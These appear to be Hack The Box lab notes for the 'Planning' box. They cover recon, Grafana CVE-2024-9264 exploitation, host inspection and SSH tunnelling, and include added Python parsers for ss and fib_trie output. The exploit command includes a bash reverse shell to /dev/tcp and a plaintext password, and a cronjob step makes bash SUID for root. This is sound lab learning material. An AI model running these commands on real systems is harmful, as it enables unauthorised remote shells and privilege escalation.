Planning

  • Hack The Box

  • nmap -p22,80 --min-rate=1000 -T4 -A -oN planning.nmap <target_ip>

  • add the hostname to /etc/hosts and explore the site
  • fuzz subdomains (virtual hosts) through the Host header:

    ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -u http://<ip> -H "Host: FUZZ.planning.htb" -t 100

    or let gobuster append the domain to each wordlist entry for you:

    gobuster vhost -w wl/wl.txt -u http://planning.htb --append-domain

  • get the version and search for CVEs (+login to dashboard)

[!hint] CVE-2024-9264 script payload:

uv run CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -c 'bash -c "bash -i >& /dev/tcp/10.10.14.45/443 0>&1"' http://grafana.planning.htb

Environment Inspection:

  • sudo -l
  • find . -type f
  • netstat -tulnp or ss -tulnp
  • grep -R <port> /etc/ 2>/dev/null or curl -v localhost:<port>

  • search inside:
    - /var/www/ for the database password
    - /opt/
    - /etc/systemd for the list of unit files (services)
    - anything related to crontab

Port Forwarding:

  • forward all of the locally available ports and start accessing them to see if any of them could be valuable to us:

    ssh -L 8000:127.0.0.1:8000 -L 3000:127.0.0.1:3000 -L 33051:127.0.0.1:33051 -L 33060:127.0.0.1:33060 enzo@planning.htb
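Added example for the inspection and forwarding steps above (not part of the original notes): a small parser for ss -tulnp output that separates loopback-bound sockets, the ones only reachable from the host itself or through a tunnel, from sockets exposed on all interfaces, and flags sockets whose owning process ss could not show. The SAMPLE text, process names and ports are constructed to resemble ss output and were not captured from the box.

```python
"""Inventory listening sockets from `ss -tulnp` output and flag loopback-only ones.

Added example, not part of the original notes. SAMPLE is constructed to
resemble `ss -tulnp` output (it was not captured from the box); the
process names and ports are illustrative only.
"""
import re
from dataclasses import dataclass

SAMPLE = """\
Netid State  Recv-Q Send-Q  Local Address:Port  Peer Address:Port Process
tcp   LISTEN 0      4096        127.0.0.1:8000       0.0.0.0:*     users:(("python3",pid=1234,fd=3))
tcp   LISTEN 0      128           0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=800,fd=3))
tcp   LISTEN 0      511         127.0.0.1:3000       0.0.0.0:*     users:(("grafana",pid=900,fd=10))
tcp   LISTEN 0      70          127.0.0.1:33060      0.0.0.0:*
udp   UNCONN 0      0       127.0.0.53%lo:53         0.0.0.0:*     users:(("systemd-resolve",pid=500,fd=13))
tcp   LISTEN 0      128              [::]:22            [::]:*     users:(("sshd",pid=800,fd=4))
"""


@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    process: str   # "" when ss could not read the owner (run as root to see all)


def parse_ss(text):
    """One Listener per socket line; the first line is ss's column header."""
    listeners = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 6:
            continue
        proto, local = fields[0], fields[4]
        addr, _, port = local.rpartition(":")
        addr = addr.split("%")[0]          # drop an interface scope such as %lo
        m = re.search(r'\(\("([^"]+)"', line)
        listeners.append(Listener(proto, addr, int(port), m.group(1) if m else ""))
    return listeners


def is_loopback(addr):
    return addr in ("::1", "[::1]") or addr.startswith("127.")


def loopback_only(listeners):
    """Sockets bound to loopback: reachable only from the host itself or through a tunnel."""
    return [l for l in listeners if is_loopback(l.addr)]


def unknown_owner(listeners):
    """Sockets whose owning process ss could not show; re-run with sudo or check /proc."""
    return [l for l in listeners if not l.process]


if __name__ == "__main__":
    ls = parse_ss(SAMPLE)
    for l in loopback_only(ls):
        print(f"loopback-only {l.proto} {l.addr}:{l.port} ({l.process or 'owner unknown'})")
    for l in unknown_owner(ls):
        print(f"owner unknown for {l.proto} {l.addr}:{l.port}")
```

During a host review the loopback-only list is exactly what the ssh -L line above reaches, so each entry deserves an owner and a reason to exist; an empty process column means ss was run unprivileged, so repeat it as root before drawing conclusions. On the hardening side, setting AllowTcpForwarding no (or a restrictive PermitOpen) in sshd_config stops a plain shell account from tunnelling to those services at all.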

[!bug] Exploit (): create a new cronjob - cp /bin/bash /tmp/23; chmod 6777 /tmp/23 - or add an additional command after the cleanup.sh - chmod u+s /bin/bash

cat /proc/net/fib_trie:

  • shows the kernel's internal Forwarding Information Base (FIB) through the data structure it is stored in, a trie - the prefix tree the kernel uses for fast longest-prefix-match lookups during IP routing.
  • a good way to confirm how the kernel has actually resolved routing, especially when policy routing, multipath, VRFs, or container networking adds layers of complexity.
  • the file isn't a config file; it's a diagnostic window.
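Added example (not part of the original notes) showing what the trie text actually encodes: a parser that turns the leaf lines ("|-- addr") and the "/<len> <scope> <type>" lines under them into route records, lists the host-scoped LOCAL /32 entries (the addresses the kernel answers for, useful when confirming a container's or VRF's view of the network), and reproduces the longest-prefix match the bullet above describes over the UNICAST entries. SAMPLE is constructed to resemble the layout of /proc/net/fib_trie and was not captured from a real host.

```python
"""Parse /proc/net/fib_trie and reproduce the kernel's longest-prefix match.

Added example, not part of the original notes. SAMPLE is constructed to
resemble the text layout of /proc/net/fib_trie; it was not captured from
a real host. Leaf lines ("|-- addr") are followed by one or more
"/<len> <scope> <type>" lines, one per route sharing that address.
"""
import ipaddress
from dataclasses import dataclass

SAMPLE = """\
Main:
  +-- 0.0.0.0/0 3 0 5
     |-- 0.0.0.0
        /0 universe UNICAST
     +-- 10.0.0.0/8 2 0 2
        |-- 10.0.0.0
           /8 link UNICAST
        +-- 10.10.14.0/24 2 0 2
           |-- 10.10.14.0
              /24 link UNICAST
           |-- 10.10.14.45
              /32 host LOCAL
           |-- 10.10.14.255
              /32 link BROADCAST
     +-- 127.0.0.0/8 2 0 2
        |-- 127.0.0.0
           /32 link BROADCAST
           /8 host LOCAL
        |-- 127.0.0.1
           /32 host LOCAL
Local:
  +-- 0.0.0.0/0 2 0 2
     |-- 10.10.14.45
        /32 host LOCAL
     |-- 127.0.0.1
        /32 host LOCAL
"""


@dataclass(frozen=True)
class Route:
    table: str      # "Main" or "Local"
    address: str
    prefixlen: int
    scope: str      # universe / link / host
    rtype: str      # UNICAST / LOCAL / BROADCAST / ...

    def network(self):
        return ipaddress.ip_network(f"{self.address}/{self.prefixlen}", strict=False)


def parse_fib_trie(text):
    routes, table, leaf = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.endswith(":"):            # "Main:" / "Local:" start a new tree
            table, leaf = line[:-1], None
        elif line.startswith("|--"):      # leaf node: an address carrying routes
            leaf = line.split()[1]
        elif line.startswith("/") and leaf is not None:
            plen, scope, rtype = line.split()[:3]
            routes.append(Route(table, leaf, int(plen[1:]), scope, rtype))
        # "+--" lines are internal trie nodes; they carry no route of their own
    return routes


def local_addresses(routes):
    """Host-scoped /32 LOCAL entries: the addresses this kernel answers for."""
    return sorted({r.address for r in routes if r.rtype == "LOCAL" and r.prefixlen == 32})


def longest_prefix_match(routes, ip, table="Main"):
    """Pick the most specific UNICAST route covering ip, as the trie lookup would."""
    target = ipaddress.ip_address(ip)
    best = None
    for r in routes:
        if r.table != table or r.rtype != "UNICAST":
            continue
        if target in r.network() and (best is None or r.prefixlen > best.prefixlen):
            best = r
    return best


if __name__ == "__main__":
    rts = parse_fib_trie(SAMPLE)
    print("local addresses:", local_addresses(rts))
    for ip in ("10.10.14.7", "10.99.0.1", "8.8.8.8"):
        print(ip, "->", longest_prefix_match(rts, ip).network())
```

The trie wins on specificity, not on order: 10.10.14.7 lands on 10.10.14.0/24 even though 10.0.0.0/8 and 0.0.0.0/0 also cover it. Comparing the parsed LOCAL /32 set against what ip addr reports is a quick way to notice an address the kernel still routes for after an interface was supposedly torn down.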